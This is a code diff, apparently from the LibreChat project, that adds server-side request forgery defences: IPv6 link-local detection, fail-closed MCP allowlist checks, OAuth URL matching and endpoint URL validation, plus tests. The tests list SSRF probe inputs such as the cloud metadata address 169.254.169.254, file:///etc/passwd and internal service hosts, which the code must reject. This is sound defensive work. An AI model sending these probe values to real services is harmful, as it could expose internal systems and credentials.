* @param params.requestFileSet - Set of file IDs from the current request * @param params.requestFileSet - Set of file IDs from the current request
* @param params.attachments - Promise resolving to array of attachment files * @param params.attachments - Promise resolving to array of attachment files
* @param params.tool_resources - Existing tool resources for the agent * @param params.tool_resources - Existing tool resources for the agent
* @param params.agentId - Agent ID used for access control filtering
* @returns Promise resolving to processed attachments and updated tool resources * @returns Promise resolving to processed attachments and updated tool resources
*/ */
export const primeResources = async ({ export const primeResources = async ({
req, req,
appConfig, appConfig,
getFiles, getFiles,
filterFiles,
requestFileSet, requestFileSet,
attachments: _attachments, attachments: _attachments,
tool_resources: _tool_resources, tool_resources: _tool_resources,
@ -157,6 +170,7 @@ export const primeResources = async ({
attachments: Promise<Array<TFile | null>> | undefined; attachments: Promise<Array<TFile | null>> | undefined;
tool_resources: AgentToolResources | undefined; tool_resources: AgentToolResources | undefined;
getFiles: TGetFiles; getFiles: TGetFiles;
filterFiles?: TFilterFilesByAgentAccess;
agentId?: string; agentId?: string;
}): Promise<{ }): Promise<{
attachments: Array<TFile | undefined> | undefined; attachments: Array<TFile | undefined> | undefined;
@ -228,15 +242,23 @@ export const primeResources = async ({
if (fileIds.length > 0 && isContextEnabled) { if (fileIds.length > 0 && isContextEnabled) {
delete tool_resources[EToolResources.context]; delete tool_resources[EToolResources.context];
const context = await getFiles( let context = await getFiles(
{ {
file_id: { $in: fileIds }, file_id: { $in: fileIds },
}, },
{}, {},
{}, {},
{ userId: req.user?.id, agentId },
); );
if (filterFiles && req.user?.id && agentId) {
context = await filterFiles({
files: context,
userId: req.user.id,
role: req.user.role,
agentId,
});
}
for (const file of context) { for (const file of context) {
if (!file?.file_id) { if (!file?.file_id) {
continue; continue;

View file

@ -8,10 +8,12 @@ import {
extractMCPServerDomain, extractMCPServerDomain,
isActionDomainAllowed, isActionDomainAllowed,
isEmailDomainAllowed, isEmailDomainAllowed,
isOAuthUrlAllowed,
isMCPDomainAllowed, isMCPDomainAllowed,
isPrivateIP, isPrivateIP,
isSSRFTarget, isSSRFTarget,
resolveHostnameSSRF, resolveHostnameSSRF,
validateEndpointURL,
} from './domain'; } from './domain';
const mockedLookup = lookup as jest.MockedFunction<typeof lookup>; const mockedLookup = lookup as jest.MockedFunction<typeof lookup>;
@ -177,6 +179,20 @@ describe('isSSRFTarget', () => {
expect(isSSRFTarget('fd00::1')).toBe(true); expect(isSSRFTarget('fd00::1')).toBe(true);
expect(isSSRFTarget('fe80::1')).toBe(true); expect(isSSRFTarget('fe80::1')).toBe(true);
}); });
it('should block full fe80::/10 link-local range (fe80febf)', () => {
expect(isSSRFTarget('fe90::1')).toBe(true);
expect(isSSRFTarget('fea0::1')).toBe(true);
expect(isSSRFTarget('feb0::1')).toBe(true);
expect(isSSRFTarget('febf::1')).toBe(true);
expect(isSSRFTarget('fec0::1')).toBe(false);
});
it('should NOT false-positive on hostnames whose first label resembles a link-local prefix', () => {
expect(isSSRFTarget('fe90.example.com')).toBe(false);
expect(isSSRFTarget('fea0.api.io')).toBe(false);
expect(isSSRFTarget('febf.service.net')).toBe(false);
});
}); });
describe('internal hostnames', () => { describe('internal hostnames', () => {
@ -277,10 +293,17 @@ describe('isPrivateIP', () => {
expect(isPrivateIP('[::1]')).toBe(true); expect(isPrivateIP('[::1]')).toBe(true);
}); });
it('should detect unique local (fc/fd) and link-local (fe80)', () => { it('should detect unique local (fc/fd) and link-local (fe80::/10)', () => {
expect(isPrivateIP('fc00::1')).toBe(true); expect(isPrivateIP('fc00::1')).toBe(true);
expect(isPrivateIP('fd00::1')).toBe(true); expect(isPrivateIP('fd00::1')).toBe(true);
expect(isPrivateIP('fe80::1')).toBe(true); expect(isPrivateIP('fe80::1')).toBe(true);
expect(isPrivateIP('fe90::1')).toBe(true);
expect(isPrivateIP('fea0::1')).toBe(true);
expect(isPrivateIP('feb0::1')).toBe(true);
expect(isPrivateIP('febf::1')).toBe(true);
expect(isPrivateIP('[fe90::1]')).toBe(true);
expect(isPrivateIP('fec0::1')).toBe(false);
expect(isPrivateIP('fe90.example.com')).toBe(false);
}); });
}); });
@ -482,6 +505,8 @@ describe('resolveHostnameSSRF', () => {
expect(await resolveHostnameSSRF('::1')).toBe(true); expect(await resolveHostnameSSRF('::1')).toBe(true);
expect(await resolveHostnameSSRF('fc00::1')).toBe(true); expect(await resolveHostnameSSRF('fc00::1')).toBe(true);
expect(await resolveHostnameSSRF('fe80::1')).toBe(true); expect(await resolveHostnameSSRF('fe80::1')).toBe(true);
expect(await resolveHostnameSSRF('fe90::1')).toBe(true);
expect(await resolveHostnameSSRF('febf::1')).toBe(true);
expect(mockedLookup).not.toHaveBeenCalled(); expect(mockedLookup).not.toHaveBeenCalled();
}); });
@ -1023,8 +1048,37 @@ describe('isMCPDomainAllowed', () => {
}); });
describe('invalid URL handling', () => { describe('invalid URL handling', () => {
it('should allow config with invalid URL (treated as stdio)', async () => { it('should reject invalid URL when allowlist is configured', async () => {
const config = { url: 'not-a-valid-url' }; const config = { url: 'not-a-valid-url' };
expect(await isMCPDomainAllowed(config, ['example.com'])).toBe(false);
});
it('should reject templated URL when allowlist is configured', async () => {
const config = { url: 'http://{{CUSTOM_HOST}}/mcp' };
expect(await isMCPDomainAllowed(config, ['example.com'])).toBe(false);
});
it('should allow invalid URL when no allowlist is configured (defers to connection-level SSRF)', async () => {
const config = { url: 'http://{{CUSTOM_HOST}}/mcp' };
expect(await isMCPDomainAllowed(config, null)).toBe(true);
expect(await isMCPDomainAllowed(config, undefined)).toBe(true);
expect(await isMCPDomainAllowed(config, [])).toBe(true);
});
it('should allow config with whitespace-only URL (treated as absent)', async () => {
const config = { url: ' ' };
expect(await isMCPDomainAllowed(config, [])).toBe(true);
expect(await isMCPDomainAllowed(config, ['example.com'])).toBe(true);
expect(await isMCPDomainAllowed(config, null)).toBe(true);
});
it('should allow config with empty string URL (treated as absent)', async () => {
const config = { url: '' };
expect(await isMCPDomainAllowed(config, ['example.com'])).toBe(true);
});
it('should allow config with no url property (stdio)', async () => {
const config = { command: 'node', args: ['server.js'] };
expect(await isMCPDomainAllowed(config, ['example.com'])).toBe(true); expect(await isMCPDomainAllowed(config, ['example.com'])).toBe(true);
}); });
}); });
@ -1157,3 +1211,225 @@ describe('isMCPDomainAllowed', () => {
}); });
}); });
}); });
describe('isOAuthUrlAllowed', () => {
it('should return false when allowedDomains is null/undefined/empty', () => {
expect(isOAuthUrlAllowed('https://example.com/token', null)).toBe(false);
expect(isOAuthUrlAllowed('https://example.com/token', undefined)).toBe(false);
expect(isOAuthUrlAllowed('https://example.com/token', [])).toBe(false);
});
it('should return false for unparseable URLs', () => {
expect(isOAuthUrlAllowed('not-a-url', ['example.com'])).toBe(false);
});
it('should match exact hostnames', () => {
expect(isOAuthUrlAllowed('https://example.com/token', ['example.com'])).toBe(true);
expect(isOAuthUrlAllowed('https://other.com/token', ['example.com'])).toBe(false);
});
it('should match wildcard subdomains', () => {
expect(isOAuthUrlAllowed('https://api.example.com/token', ['*.example.com'])).toBe(true);
expect(isOAuthUrlAllowed('https://deep.nested.example.com/token', ['*.example.com'])).toBe(
true,
);
expect(isOAuthUrlAllowed('https://example.com/token', ['*.example.com'])).toBe(true);
expect(isOAuthUrlAllowed('https://other.com/token', ['*.example.com'])).toBe(false);
});
it('should be case-insensitive', () => {
expect(isOAuthUrlAllowed('https://EXAMPLE.COM/token', ['example.com'])).toBe(true);
expect(isOAuthUrlAllowed('https://example.com/token', ['EXAMPLE.COM'])).toBe(true);
});
it('should match private/internal URLs when hostname is in allowedDomains', () => {
expect(isOAuthUrlAllowed('http://localhost:8080/token', ['localhost'])).toBe(true);
expect(isOAuthUrlAllowed('http://10.0.0.1/token', ['10.0.0.1'])).toBe(true);
expect(
isOAuthUrlAllowed('http://host.docker.internal:8044/token', ['host.docker.internal']),
).toBe(true);
expect(isOAuthUrlAllowed('http://myserver.local/token', ['*.local'])).toBe(true);
});
it('should match internal URLs with wildcard patterns', () => {
expect(isOAuthUrlAllowed('https://auth.company.internal/token', ['*.company.internal'])).toBe(
true,
);
expect(isOAuthUrlAllowed('https://company.internal/token', ['*.company.internal'])).toBe(true);
});
it('should not match when hostname is absent from allowedDomains', () => {
expect(isOAuthUrlAllowed('http://10.0.0.1/token', ['192.168.1.1'])).toBe(false);
expect(isOAuthUrlAllowed('http://localhost/token', ['host.docker.internal'])).toBe(false);
});
describe('protocol and port constraint enforcement', () => {
it('should enforce protocol when allowedDomains specifies one', () => {
expect(isOAuthUrlAllowed('https://auth.internal/token', ['https://auth.internal'])).toBe(
true,
);
expect(isOAuthUrlAllowed('http://auth.internal/token', ['https://auth.internal'])).toBe(
false,
);
});
it('should allow any protocol when allowedDomains has bare hostname', () => {
expect(isOAuthUrlAllowed('http://auth.internal/token', ['auth.internal'])).toBe(true);
expect(isOAuthUrlAllowed('https://auth.internal/token', ['auth.internal'])).toBe(true);
});
it('should enforce port when allowedDomains specifies one', () => {
expect(
isOAuthUrlAllowed('https://auth.internal:8443/token', ['https://auth.internal:8443']),
).toBe(true);
expect(
isOAuthUrlAllowed('https://auth.internal:6379/token', ['https://auth.internal:8443']),
).toBe(false);
expect(isOAuthUrlAllowed('https://auth.internal/token', ['https://auth.internal:8443'])).toBe(
false,
);
});
it('should allow any port when allowedDomains has no explicit port', () => {
expect(isOAuthUrlAllowed('https://auth.internal:8443/token', ['auth.internal'])).toBe(true);
expect(isOAuthUrlAllowed('https://auth.internal:22/token', ['auth.internal'])).toBe(true);
});
it('should reject wrong port even when hostname matches (prevents port-scanning)', () => {
expect(isOAuthUrlAllowed('http://10.0.0.1:6379/token', ['http://10.0.0.1:8080'])).toBe(false);
expect(isOAuthUrlAllowed('http://10.0.0.1:25/token', ['http://10.0.0.1:8080'])).toBe(false);
});
});
});
describe('validateEndpointURL', () => {
afterEach(() => {
jest.clearAllMocks();
});
it('should throw for unparseable URLs', async () => {
await expect(validateEndpointURL('not-a-url', 'test-ep')).rejects.toThrow(
'Invalid base URL for test-ep',
);
});
it('should throw for localhost URLs', async () => {
await expect(validateEndpointURL('http://localhost:8080/v1', 'test-ep')).rejects.toThrow(
'targets a restricted address',
);
});
it('should throw for private IP URLs', async () => {
await expect(validateEndpointURL('http://192.168.1.1/v1', 'test-ep')).rejects.toThrow(
'targets a restricted address',
);
await expect(validateEndpointURL('http://10.0.0.1/v1', 'test-ep')).rejects.toThrow(
'targets a restricted address',
);
await expect(validateEndpointURL('http://172.16.0.1/v1', 'test-ep')).rejects.toThrow(
'targets a restricted address',
);
});
it('should throw for link-local / metadata IP', async () => {
await expect(
validateEndpointURL('http://169.254.169.254/latest/meta-data/', 'test-ep'),
).rejects.toThrow('targets a restricted address');
});
it('should throw for loopback IP', async () => {
await expect(validateEndpointURL('http://127.0.0.1:11434/v1', 'test-ep')).rejects.toThrow(
'targets a restricted address',
);
});
it('should throw for internal Docker/Kubernetes hostnames', async () => {
await expect(validateEndpointURL('http://redis:6379/', 'test-ep')).rejects.toThrow(
'targets a restricted address',
);
await expect(validateEndpointURL('http://mongodb:27017/', 'test-ep')).rejects.toThrow(
'targets a restricted address',
);
});
it('should throw when hostname DNS-resolves to a private IP', async () => {
mockedLookup.mockResolvedValueOnce([{ address: '10.0.0.5', family: 4 }] as never);
await expect(validateEndpointURL('https://evil.example.com/v1', 'test-ep')).rejects.toThrow(
'resolves to a restricted address',
);
});
it('should allow public URLs', async () => {
mockedLookup.mockResolvedValueOnce([{ address: '104.18.7.192', family: 4 }] as never);
await expect(
validateEndpointURL('https://api.openai.com/v1', 'test-ep'),
).resolves.toBeUndefined();
});
it('should allow public URLs that resolve to public IPs', async () => {
mockedLookup.mockResolvedValueOnce([{ address: '8.8.8.8', family: 4 }] as never);
await expect(
validateEndpointURL('https://api.example.com/v1/chat', 'test-ep'),
).resolves.toBeUndefined();
});
it('should throw for non-HTTP/HTTPS schemes', async () => {
await expect(validateEndpointURL('ftp://example.com/v1', 'test-ep')).rejects.toThrow(
'only HTTP and HTTPS are permitted',
);
await expect(validateEndpointURL('file:///etc/passwd', 'test-ep')).rejects.toThrow(
'only HTTP and HTTPS are permitted',
);
await expect(validateEndpointURL('data:text/plain,hello', 'test-ep')).rejects.toThrow(
'only HTTP and HTTPS are permitted',
);
});
it('should throw for IPv6 loopback URL', async () => {
await expect(validateEndpointURL('http://[::1]:8080/v1', 'test-ep')).rejects.toThrow(
'targets a restricted address',
);
});
it('should throw for IPv6 link-local URL', async () => {
await expect(validateEndpointURL('http://[fe80::1]/v1', 'test-ep')).rejects.toThrow(
'targets a restricted address',
);
});
it('should throw for IPv6 unique-local URL', async () => {
await expect(validateEndpointURL('http://[fc00::1]/v1', 'test-ep')).rejects.toThrow(
'targets a restricted address',
);
});
it('should throw for .local TLD hostname', async () => {
await expect(validateEndpointURL('http://myservice.local/v1', 'test-ep')).rejects.toThrow(
'targets a restricted address',
);
});
it('should throw for .internal TLD hostname', async () => {
await expect(validateEndpointURL('http://api.internal/v1', 'test-ep')).rejects.toThrow(
'targets a restricted address',
);
});
it('should pass when DNS lookup fails (fail-open)', async () => {
mockedLookup.mockRejectedValueOnce(new Error('ENOTFOUND'));
await expect(
validateEndpointURL('https://nonexistent.example.com/v1', 'test-ep'),
).resolves.toBeUndefined();
});
it('should throw structured JSON with type invalid_base_url', async () => {
const error = await validateEndpointURL('http://169.254.169.254/latest/', 'my-ep').catch(
(err: Error) => err,
);
expect(error).toBeInstanceOf(Error);
const parsed = JSON.parse((error as Error).message);
expect(parsed.type).toBe('invalid_base_url');
expect(parsed.message).toContain('my-ep');
expect(parsed.message).toContain('targets a restricted address');
});
});

View file

@ -59,6 +59,20 @@ function isPrivateIPv4(a: number, b: number, c: number): boolean {
return false; return false;
} }
/** Checks if a pre-normalized (lowercase, bracket-stripped) IPv6 address falls within fe80::/10 */
function isIPv6LinkLocal(ipv6: string): boolean {
if (!ipv6.includes(':')) {
return false;
}
const firstHextet = ipv6.split(':', 1)[0];
if (!firstHextet || !/^[0-9a-f]{1,4}$/.test(firstHextet)) {
return false;
}
const hextet = parseInt(firstHextet, 16);
// /10 mask (0xffc0) preserves top 10 bits: fe80 = 1111_1110_10xx_xxxx
return (hextet & 0xffc0) === 0xfe80;
}
/** Checks if an IPv6 address embeds a private IPv4 via 6to4, NAT64, or Teredo */ /** Checks if an IPv6 address embeds a private IPv4 via 6to4, NAT64, or Teredo */
function hasPrivateEmbeddedIPv4(ipv6: string): boolean { function hasPrivateEmbeddedIPv4(ipv6: string): boolean {
if (!ipv6.startsWith('2002:') && !ipv6.startsWith('64:ff9b::') && !ipv6.startsWith('2001::')) { if (!ipv6.startsWith('2002:') && !ipv6.startsWith('64:ff9b::') && !ipv6.startsWith('2001::')) {
@ -132,9 +146,9 @@ export function isPrivateIP(ip: string): boolean {
if ( if (
normalized === '::1' || normalized === '::1' ||
normalized === '::' || normalized === '::' ||
normalized.startsWith('fc') || normalized.startsWith('fc') || // fc00::/7 — exactly prefixes 'fc' and 'fd'
normalized.startsWith('fd') || normalized.startsWith('fd') ||
normalized.startsWith('fe80') isIPv6LinkLocal(normalized) // fe80::/10 — spans 0xfe800xfebf; bitwise check required
) { ) {
return true; return true;
} }
@ -428,7 +442,10 @@ export async function isActionDomainAllowed(
/** /**
* Extracts full domain spec (protocol://hostname:port) from MCP server config URL. * Extracts full domain spec (protocol://hostname:port) from MCP server config URL.
* Returns the full origin for proper protocol/port matching against allowedDomains. * Returns the full origin for proper protocol/port matching against allowedDomains.
* Returns null for stdio transports (no URL) or invalid URLs. * @returns The full origin string, or null when:
* - No `url` property, non-string, or empty (stdio transport always allowed upstream)
* - URL string present but cannot be parsed (rejected fail-closed upstream when allowlist active)
* Callers must distinguish these two null cases; see {@link isMCPDomainAllowed}.
* @param config - MCP server configuration (accepts any config with optional url field) * @param config - MCP server configuration (accepts any config with optional url field)
*/ */
export function extractMCPServerDomain(config: Record<string, unknown>): string | null { export function extractMCPServerDomain(config: Record<string, unknown>): string | null {
@ -452,6 +469,11 @@ export function extractMCPServerDomain(config: Record<string, unknown>): string
* Validates MCP server domain against allowedDomains. * Validates MCP server domain against allowedDomains.
* Supports HTTP, HTTPS, WS, and WSS protocols (per MCP specification). * Supports HTTP, HTTPS, WS, and WSS protocols (per MCP specification).
* Stdio transports (no URL) are always allowed. * Stdio transports (no URL) are always allowed.
* Configs with a non-empty URL that cannot be parsed are rejected fail-closed when an
* allowlist is active, preventing template placeholders (e.g. `{{HOST}}`) from bypassing
* domain validation after `processMCPEnv` resolves them at connection time.
* When no allowlist is configured, unparseable URLs fall through to connection-level
* SSRF protection (`createSSRFSafeUndiciConnect`).
* @param config - MCP server configuration with optional url field * @param config - MCP server configuration with optional url field
* @param allowedDomains - List of allowed domains (with wildcard support) * @param allowedDomains - List of allowed domains (with wildcard support)
*/ */
@ -460,8 +482,18 @@ export async function isMCPDomainAllowed(
allowedDomains?: string[] | null, allowedDomains?: string[] | null,
): Promise<boolean> { ): Promise<boolean> {
const domain = extractMCPServerDomain(config); const domain = extractMCPServerDomain(config);
const hasAllowlist = Array.isArray(allowedDomains) && allowedDomains.length > 0;
// Stdio transports don't have domains - always allowed const hasExplicitUrl =
Object.prototype.hasOwnProperty.call(config, 'url') &&
typeof config.url === 'string' &&
config.url.trim().length > 0;
if (!domain && hasExplicitUrl && hasAllowlist) {
return false;
}
// Stdio transports (no URL) are always allowed
if (!domain) { if (!domain) {
return true; return true;
} }
@ -469,3 +501,91 @@ export async function isMCPDomainAllowed(
// Use MCP_PROTOCOLS (HTTP/HTTPS/WS/WSS) for MCP server validation // Use MCP_PROTOCOLS (HTTP/HTTPS/WS/WSS) for MCP server validation
return isDomainAllowedCore(domain, allowedDomains, MCP_PROTOCOLS); return isDomainAllowedCore(domain, allowedDomains, MCP_PROTOCOLS);
} }
/**
* Checks whether an OAuth URL matches any entry in the MCP allowedDomains list,
* honoring protocol and port constraints when specified by the admin.
*
* Mirrors the allowlist-matching logic of {@link isDomainAllowedCore} (hostname,
* protocol, and explicit-port checks) but is synchronous no DNS resolution is
* needed because the caller is deciding whether to *skip* the subsequent
* SSRF/DNS checks, not replace them.
*
* @remarks `parseDomainSpec` normalizes `www.` prefixes, so both the input URL
* and allowedDomains entries starting with `www.` are matched without that prefix.
*/
export function isOAuthUrlAllowed(url: string, allowedDomains?: string[] | null): boolean {
if (!Array.isArray(allowedDomains) || allowedDomains.length === 0) {
return false;
}
const inputSpec = parseDomainSpec(url);
if (!inputSpec) {
return false;
}
for (const allowedDomain of allowedDomains) {
const allowedSpec = parseDomainSpec(allowedDomain);
if (!allowedSpec) {
continue;
}
if (!hostnameMatches(inputSpec.hostname, allowedSpec)) {
continue;
}
if (allowedSpec.protocol !== null) {
if (inputSpec.protocol === null || inputSpec.protocol !== allowedSpec.protocol) {
continue;
}
}
if (allowedSpec.explicitPort) {
if (!inputSpec.explicitPort || inputSpec.port !== allowedSpec.port) {
continue;
}
}
return true;
}
return false;
}
/** Matches ErrorTypes.INVALID_BASE_URL — string literal avoids build-time dependency on data-provider */
const INVALID_BASE_URL_TYPE = 'invalid_base_url';
function throwInvalidBaseURL(message: string): never {
throw new Error(JSON.stringify({ type: INVALID_BASE_URL_TYPE, message }));
}
/**
* Validates that a user-provided endpoint URL does not target private/internal addresses.
* Throws if the URL is unparseable, uses a non-HTTP(S) scheme, targets a known SSRF hostname,
* or DNS-resolves to a private IP.
*
* @note DNS rebinding: validation performs a single DNS lookup. An adversary controlling
* DNS with TTL=0 could respond with a public IP at validation time and a private IP
* at request time. This is an accepted limitation of point-in-time DNS checks.
* @note Fail-open on DNS errors: a resolution failure here implies a failure at request
* time as well, matching {@link resolveHostnameSSRF} semantics.
*/
export async function validateEndpointURL(url: string, endpoint: string): Promise<void> {
let hostname: string;
let protocol: string;
try {
const parsed = new URL(url);
hostname = parsed.hostname;
protocol = parsed.protocol;
} catch {
throwInvalidBaseURL(`Invalid base URL for ${endpoint}: unable to parse URL.`);
}
if (protocol !== 'http:' && protocol !== 'https:') {
throwInvalidBaseURL(`Invalid base URL for ${endpoint}: only HTTP and HTTPS are permitted.`);
}
if (isSSRFTarget(hostname)) {
throwInvalidBaseURL(`Base URL for ${endpoint} targets a restricted address.`);
}
if (await resolveHostnameSSRF(hostname)) {
throwInvalidBaseURL(`Base URL for ${endpoint} resolves to a restricted address.`);
}
}

View file

@ -32,14 +32,22 @@ describe('LeaderElection with Redis', () => {
process.setMaxListeners(200); process.setMaxListeners(200);
}); });
afterEach(async () => { beforeEach(async () => {
await Promise.all(instances.map((instance) => instance.resign()));
instances = [];
// Clean up: clear the leader key directly from Redis
if (keyvRedisClient) { if (keyvRedisClient) {
await keyvRedisClient.del(LeaderElection.LEADER_KEY); await keyvRedisClient.del(LeaderElection.LEADER_KEY);
} }
new LeaderElection().clearRefreshTimer();
});
afterEach(async () => {
try {
await Promise.all(instances.map((instance) => instance.resign()));
} finally {
instances = [];
if (keyvRedisClient) {
await keyvRedisClient.del(LeaderElection.LEADER_KEY);
}
}
}); });
afterAll(async () => { afterAll(async () => {

View file

@ -0,0 +1,119 @@
import { AuthType } from 'librechat-data-provider';
import type { BaseInitializeParams } from '~/types';
const mockValidateEndpointURL = jest.fn();
jest.mock('~/auth', () => ({
validateEndpointURL: (...args: unknown[]) => mockValidateEndpointURL(...args),
}));
const mockGetOpenAIConfig = jest.fn().mockReturnValue({
llmConfig: { model: 'test-model' },
configOptions: {},
});
jest.mock('~/endpoints/openai/config', () => ({
getOpenAIConfig: (...args: unknown[]) => mockGetOpenAIConfig(...args),
}));
jest.mock('~/endpoints/models', () => ({
fetchModels: jest.fn(),
}));
jest.mock('~/cache', () => ({
standardCache: jest.fn(() => ({ get: jest.fn().mockResolvedValue(null) })),
}));
jest.mock('~/utils', () => ({
isUserProvided: (val: string) => val === 'user_provided',
checkUserKeyExpiry: jest.fn(),
}));
const mockGetCustomEndpointConfig = jest.fn();
jest.mock('~/app/config', () => ({
getCustomEndpointConfig: (...args: unknown[]) => mockGetCustomEndpointConfig(...args),
}));
import { initializeCustom } from './initialize';
function createParams(overrides: {
apiKey?: string;
baseURL?: string;
userBaseURL?: string;
userApiKey?: string;
expiresAt?: string;
}): BaseInitializeParams {
const { apiKey = 'sk-test-key', baseURL = 'https://api.example.com/v1' } = overrides;
mockGetCustomEndpointConfig.mockReturnValue({
apiKey,
baseURL,
models: {},
});
const db = {
getUserKeyValues: jest.fn().mockResolvedValue({
apiKey: overrides.userApiKey ?? 'sk-user-key',
baseURL: overrides.userBaseURL ?? 'https://user-api.example.com/v1',
}),
} as unknown as BaseInitializeParams['db'];
return {
req: {
user: { id: 'user-1' },
body: { key: overrides.expiresAt ?? '2099-01-01' },
config: {},
} as unknown as BaseInitializeParams['req'],
endpoint: 'test-custom',
model_parameters: { model: 'gpt-4' },
db,
};
}
describe('initializeCustom SSRF guard wiring', () => {
beforeEach(() => {
jest.clearAllMocks();
});
it('should call validateEndpointURL when baseURL is user_provided', async () => {
const params = createParams({
apiKey: 'sk-test-key',
baseURL: AuthType.USER_PROVIDED,
userBaseURL: 'https://user-api.example.com/v1',
expiresAt: '2099-01-01',
});
await initializeCustom(params);
expect(mockValidateEndpointURL).toHaveBeenCalledTimes(1);
expect(mockValidateEndpointURL).toHaveBeenCalledWith(
'https://user-api.example.com/v1',
'test-custom',
);
});
it('should NOT call validateEndpointURL when baseURL is system-defined', async () => {
const params = createParams({
apiKey: 'sk-test-key',
baseURL: 'https://api.provider.com/v1',
});
await initializeCustom(params);
expect(mockValidateEndpointURL).not.toHaveBeenCalled();
});
it('should propagate SSRF rejection from validateEndpointURL', async () => {
mockValidateEndpointURL.mockRejectedValueOnce(
new Error('Base URL for test-custom targets a restricted address.'),
);
const params = createParams({
apiKey: 'sk-test-key',
baseURL: AuthType.USER_PROVIDED,
userBaseURL: 'http://169.254.169.254/latest/meta-data/',
expiresAt: '2099-01-01',
});
await expect(initializeCustom(params)).rejects.toThrow('targets a restricted address');
expect(mockGetOpenAIConfig).not.toHaveBeenCalled();
});
});

View file

@ -9,9 +9,10 @@ import type { TEndpoint } from 'librechat-data-provider';
import type { AppConfig } from '@librechat/data-schemas'; import type { AppConfig } from '@librechat/data-schemas';
import type { BaseInitializeParams, InitializeResultBase, EndpointTokenConfig } from '~/types'; import type { BaseInitializeParams, InitializeResultBase, EndpointTokenConfig } from '~/types';
import { getOpenAIConfig } from '~/endpoints/openai/config'; import { getOpenAIConfig } from '~/endpoints/openai/config';
import { isUserProvided, checkUserKeyExpiry } from '~/utils';
import { getCustomEndpointConfig } from '~/app/config'; import { getCustomEndpointConfig } from '~/app/config';
import { fetchModels } from '~/endpoints/models'; import { fetchModels } from '~/endpoints/models';
import { isUserProvided, checkUserKeyExpiry } from '~/utils'; import { validateEndpointURL } from '~/auth';
import { standardCache } from '~/cache'; import { standardCache } from '~/cache';
const { PROXY } = process.env; const { PROXY } = process.env;
@ -123,6 +124,10 @@ export async function initializeCustom({
throw new Error(`${endpoint} Base URL not provided.`); throw new Error(`${endpoint} Base URL not provided.`);
} }
if (userProvidesURL) {
await validateEndpointURL(baseURL, endpoint);
}
let endpointTokenConfig: EndpointTokenConfig | undefined; let endpointTokenConfig: EndpointTokenConfig | undefined;
const userId = req.user?.id ?? ''; const userId = req.user?.id ?? '';

View file

@ -0,0 +1,135 @@
import { AuthType, EModelEndpoint } from 'librechat-data-provider';
import type { BaseInitializeParams } from '~/types';
const mockValidateEndpointURL = jest.fn();
jest.mock('~/auth', () => ({
validateEndpointURL: (...args: unknown[]) => mockValidateEndpointURL(...args),
}));
const mockGetOpenAIConfig = jest.fn().mockReturnValue({
llmConfig: { model: 'gpt-4' },
configOptions: {},
});
jest.mock('./config', () => ({
getOpenAIConfig: (...args: unknown[]) => mockGetOpenAIConfig(...args),
}));
jest.mock('~/utils', () => ({
getAzureCredentials: jest.fn(),
resolveHeaders: jest.fn(() => ({})),
isUserProvided: (val: string) => val === 'user_provided',
checkUserKeyExpiry: jest.fn(),
}));
import { initializeOpenAI } from './initialize';
function createParams(env: Record<string, string | undefined>): BaseInitializeParams {
const savedEnv: Record<string, string | undefined> = {};
for (const key of Object.keys(env)) {
savedEnv[key] = process.env[key];
}
Object.assign(process.env, env);
const db = {
getUserKeyValues: jest.fn().mockResolvedValue({
apiKey: 'sk-user-key',
baseURL: 'https://user-proxy.example.com/v1',
}),
} as unknown as BaseInitializeParams['db'];
const params: BaseInitializeParams = {
req: {
user: { id: 'user-1' },
body: { key: '2099-01-01' },
config: { endpoints: {} },
} as unknown as BaseInitializeParams['req'],
endpoint: EModelEndpoint.openAI,
model_parameters: { model: 'gpt-4' },
db,
};
const restore = () => {
for (const key of Object.keys(env)) {
if (savedEnv[key] === undefined) {
delete process.env[key];
} else {
process.env[key] = savedEnv[key];
}
}
};
return Object.assign(params, { _restore: restore });
}
describe('initializeOpenAI SSRF guard wiring', () => {
afterEach(() => {
jest.clearAllMocks();
});
it('should call validateEndpointURL when OPENAI_REVERSE_PROXY is user_provided', async () => {
const params = createParams({
OPENAI_API_KEY: 'sk-test',
OPENAI_REVERSE_PROXY: AuthType.USER_PROVIDED,
});
try {
await initializeOpenAI(params);
} finally {
(params as unknown as { _restore: () => void })._restore();
}
expect(mockValidateEndpointURL).toHaveBeenCalledTimes(1);
expect(mockValidateEndpointURL).toHaveBeenCalledWith(
'https://user-proxy.example.com/v1',
EModelEndpoint.openAI,
);
});
it('should NOT call validateEndpointURL when OPENAI_REVERSE_PROXY is a system URL', async () => {
const params = createParams({
OPENAI_API_KEY: 'sk-test',
OPENAI_REVERSE_PROXY: 'https://api.openai.com/v1',
});
try {
await initializeOpenAI(params);
} finally {
(params as unknown as { _restore: () => void })._restore();
}
expect(mockValidateEndpointURL).not.toHaveBeenCalled();
});
it('should NOT call validateEndpointURL when baseURL is falsy', async () => {
const params = createParams({
OPENAI_API_KEY: 'sk-test',
});
try {
await initializeOpenAI(params);
} finally {
(params as unknown as { _restore: () => void })._restore();
}
expect(mockValidateEndpointURL).not.toHaveBeenCalled();
});
it('should propagate SSRF rejection from validateEndpointURL', async () => {
mockValidateEndpointURL.mockRejectedValueOnce(
new Error('Base URL for openAI targets a restricted address.'),
);
const params = createParams({
OPENAI_API_KEY: 'sk-test',
OPENAI_REVERSE_PROXY: AuthType.USER_PROVIDED,
});
try {
await expect(initializeOpenAI(params)).rejects.toThrow('targets a restricted address');
} finally {
(params as unknown as { _restore: () => void })._restore();
}
expect(mockGetOpenAIConfig).not.toHaveBeenCalled();
});
});

Some files were not shown because too many files have changed in this diff Show more